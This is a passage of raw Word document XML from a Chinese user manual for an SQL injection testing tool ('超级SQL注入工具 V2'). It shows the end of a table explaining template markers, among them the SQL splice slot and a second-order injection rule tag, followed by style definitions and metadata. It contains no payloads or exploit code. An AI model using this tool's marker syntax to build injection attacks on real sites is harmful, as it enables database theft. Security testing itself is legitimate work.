              <w:t>&lt;DRule&gt;标记名:占位值&lt;DRule&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="5C4AAE5A">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>用户标记</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="647636A6">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>动态规则替换点：发包前由对应动态规则（请求抓取 / 脚本生成）填充，冒号后为占位兜底值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="4C4FF95E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>$sql$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="26C3BF32">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>内部标记</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="6F10F7BC">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>取数 SQL 拼接槽位，全报文唯一</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="4708289C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt;Sencond:标记名&gt;…&lt;/Sencond&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="47170458">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>内部标记</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="0101B456">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>二次注入后置规则指令，发包前剔除，不随请求发出</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="043955A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt;Rand&gt; / &lt;EncodeRaw&gt; / &lt;EncodeBase64&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="2DAF982A">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>已废弃</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="4193E4D6">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>旧版标记，已从解析器、高亮与文档中移除，请勿使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="467BE3E6"/>
    <w:p w14:paraId="19E8B568">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
        <w:t>手册结束 · 超级SQL注入工具V2（V2.0.0）</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38B01B8">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36"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88" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3B63"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FC693F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="160" w:line="288" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3B63"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FC693F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="120" w:line="288" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3B63"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FC693F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="120" w:line="288" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3B63"/>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超级SQL注入工具 V2 · 使用手册</dc:title>
  <dc:subject/>
  <dc:creator>shack2</dc:creator>
  <cp:keywords/>
  <dc:description>generated by python-docx</dc:description>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>